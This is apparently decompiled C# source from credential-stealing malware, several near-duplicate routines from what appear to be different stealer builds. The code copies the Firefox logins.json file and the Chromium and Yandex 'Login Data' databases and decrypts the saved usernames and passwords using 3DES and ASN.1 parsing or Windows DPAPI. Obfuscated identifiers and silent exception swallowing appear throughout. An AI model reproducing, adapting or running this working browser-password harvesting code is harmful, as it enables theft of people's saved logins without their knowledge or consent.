// Token: 0x06000CC6 RID: 3270 RVA: 0x000285A4 File Offset: 0x000267A4
public List <BrowserCredendtial> Lopos(string profile, byte[] privateKey)
{
List <BrowserCredendtial> list = new List <BrowserCredendtial>();
try
{
string path = rcvr.CreateTempCopy(Path.Combine(profile, "logins.json"));
if (!File.Exists(path))
{
return(list);
}
foreach (object obj in ((IEnumerable)File.ReadAllText(path).FromJSON()["logins"]))
{
JsonValue jsonValue = (JsonValue)obj;
нкрпар нкрпар = Апн.Create(Convert.FromBase64String(jsonValue["encryptedUsername"].ToString(false)));
нкрпар нкрпар2 = Апн.Create(Convert.FromBase64String(jsonValue["encryptedPassword"].ToString(false)));
string text = Regex.Replace(шо67г.lTRjlt(privateKey, нкрпар.Objects[0].Objects[1].Objects[1].ObjectData, нкрпар.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string text2 = Regex.Replace(шо67г.lTRjlt(privateKey, нкрпар2.Objects[0].Objects[1].Objects[1].ObjectData, нкрпар2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
BrowserCredendtial browserCredendtial = new BrowserCredendtial
{
URL = (string.IsNullOrEmpty(jsonValue["hostname"].ToString(false)) ? "UNKNOWN" : jsonValue["hostname"].ToString(false)),
Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text),
Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2)
};
if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN")
{
list.Add(browserCredendtial);
}
}
}
catch (Exception)
{
}
return(list);
}
// Token: 0x06000C99 RID: 3225 RVA: 0x0002682C File Offset: 0x00024A2C
public List <BrowserCredendtial> GetCredentials(string profilePath)
{
List <BrowserCredendtial> list = new List <BrowserCredendtial>();
try
{
string text = Path.Combine(profilePath, "Login Data");
if (!File.Exists(text))
{
return(list);
}
CNT cnt = new CNT(rcvr.CreateTempCopy(text));
cnt.ReadTable("logins");
for (int i = 0; i < cnt.RowLength; i++)
{
BrowserCredendtial browserCredendtial = new BrowserCredendtial();
try
{
browserCredendtial = this.ReadData(cnt, i);
}
catch
{
}
if (browserCredendtial.Login.IsNotNull <string>() && browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN")
{
list.Add(browserCredendtial);
}
}
}
catch
{
}
return(list);
}
// Token: 0x06000C9D RID: 3229 RVA: 0x00026C64 File Offset: 0x00024E64
private BrowserCredendtial ReadData(CNT manager, int row)
{
BrowserCredendtial browserCredendtial = new BrowserCredendtial();
try
{
browserCredendtial.URL = manager.ParseValue(row, "origin_url").Trim();
browserCredendtial.Login = manager.ParseValue(row, "username_value").Trim();
browserCredendtial.Password = rcvr.DecryptBlob(manager.ParseValue(row, "password_value"), DataProtectionScope.CurrentUser, null).Trim();
}
catch
{
}
finally
{
browserCredendtial.Login = (string.IsNullOrEmpty(browserCredendtial.Login) ? "UNKNOWN" : browserCredendtial.Login);
browserCredendtial.Password = (string.IsNullOrEmpty(browserCredendtial.Password) ? "UNKNOWN" : browserCredendtial.Password);
browserCredendtial.URL = (string.IsNullOrEmpty(browserCredendtial.URL) ? "UNKNOWN" : browserCredendtial.URL);
}
return(browserCredendtial);
}
// Token: 0x060000B3 RID: 179 RVA: 0x0000598C File Offset: 0x00003B8C
public static BrowserCredendtial OldChromeCredential(SQLiteManager manager, int row)
{
BrowserCredendtial browserCredendtial = new BrowserCredendtial();
try
{
browserCredendtial.URL = manager.GetValue(row, "origin_url").Trim();
browserCredendtial.Login = manager.GetValue(row, "username_value").Trim();
browserCredendtial.Password = ChromiumManager.DecryptBlob(manager.GetValue(row, "password_value"), DataProtectionScope.CurrentUser, null, false).Trim();
}
catch
{
}
finally
{
browserCredendtial.Login = (string.IsNullOrEmpty(browserCredendtial.Login) ? "UNKNOWN" : browserCredendtial.Login);
browserCredendtial.Password = (string.IsNullOrEmpty(browserCredendtial.Password) ? "UNKNOWN" : browserCredendtial.Password);
browserCredendtial.URL = (string.IsNullOrEmpty(browserCredendtial.URL) ? "UNKNOWN" : browserCredendtial.URL);
}
return(browserCredendtial);
}
// Token: 0x060000E5 RID: 229 RVA: 0x00007090 File Offset: 0x00005290
private static IEnumerable <BrowserCredendtial> ExtractLogins(string profile, byte[] privateKey)
{
List <BrowserCredendtial> list = new List <BrowserCredendtial>();
try
{
string path = ChromiumManager.CreateTempCopy(Path.Combine(profile, "logins.json"));
if (!File.Exists(path))
{
return(list);
}
RootLogin rootLogin = File.ReadAllText(path).FromJSON <RootLogin>();
Asn1Der asn1Der = new Asn1Der();
foreach (LoginJson loginJson in rootLogin.logins)
{
Asn1DerObject asn1DerObject = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedUsername));
Asn1DerObject asn1DerObject2 = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedPassword));
string text = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject.objects[0].objects[1].objects[1].Data, asn1DerObject.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string text2 = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject2.objects[0].objects[1].objects[1].Data, asn1DerObject2.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
BrowserCredendtial browserCredendtial = new BrowserCredendtial
{
URL = (string.IsNullOrEmpty(loginJson.hostname) ? "UNKNOWN" : loginJson.hostname),
Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text),
Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2)
};
if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN")
{
list.Add(browserCredendtial);
}
}
}
catch (Exception value)
{
Console.WriteLine(value);
}
return(list);
}
// Token: 0x060000AD RID: 173 RVA: 0x0000550C File Offset: 0x0000370C
public static IEnumerable <BrowserCredendtial> ExtractCredentials(string profilePath)
{
List <BrowserCredendtial> list = new List <BrowserCredendtial>();
try
{
string text = Path.Combine(profilePath, "Ya Login Data");
string text2 = Path.Combine(profilePath, "Login Data");
if (!File.Exists(text) && !File.Exists(text2))
{
return(list);
}
string filePath = (!File.Exists(text)) ? text2 : text;
string empty = string.Empty;
SQLiteManager sqliteManager = new SQLiteManager(ChromiumManager.CreateTempCopy(filePath));
sqliteManager.ReadTable("logins");
for (int i = 0; i < sqliteManager.GetRowCount(); i++)
{
BrowserCredendtial browserCredendtial = new BrowserCredendtial();
try
{
browserCredendtial = ChromiumManager.OldChromeCredential(sqliteManager, i);
}
catch
{
}
if (browserCredendtial.Login.IsNotNull <string>() && browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN")
{
list.Add(browserCredendtial);
}
}
}
catch
{
}
return(list);
}
// Token: 0x0600009C RID: 156 RVA: 0x00006864 File Offset: 0x00004A64
public List <BrowserCredendtial> GetLogins(string profile, byte[] privateKey)
{
List <BrowserCredendtial> list = new List <BrowserCredendtial>();
try
{
string path = RecoveryHelper.CreateTempCopy(Path.Combine(profile, "logins.json"));
if (!File.Exists(path))
{
return(list);
}
GeckoLogin[] logins = File.ReadAllText(path).FromJSON <GeckoRootEntry>().logins;
for (int i = 0; i < logins.Length; i++)
{
GeckoLogin geckoLogin = logins[i];
Asn1Object asn1Object = Asn1Factory.Create(Convert.FromBase64String(geckoLogin.encryptedUsername));
Asn1Object asn1Object2 = Asn1Factory.Create(Convert.FromBase64String(geckoLogin.encryptedPassword));
string text = Regex.Replace(CrytoServiceProvider.Decode(privateKey, asn1Object.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string text2 = Regex.Replace(CrytoServiceProvider.Decode(privateKey, asn1Object2.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
BrowserCredendtial browserCredendtial = new BrowserCredendtial
{
URL = (string.IsNullOrEmpty(geckoLogin.hostname) ? "UNKNOWN" : geckoLogin.hostname),
Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text),
Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2)
};
if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN")
{
list.Add(browserCredendtial);
}
}
}
catch (Exception)
{
}
return(list);
}
// Token: 0x060000A6 RID: 166 RVA: 0x00002377 File Offset: 0x00000577
internal bool <GetAll> b__0_1(BrowserCredendtial x)
{
return(x.IsNotNull <BrowserCredendtial>());
}
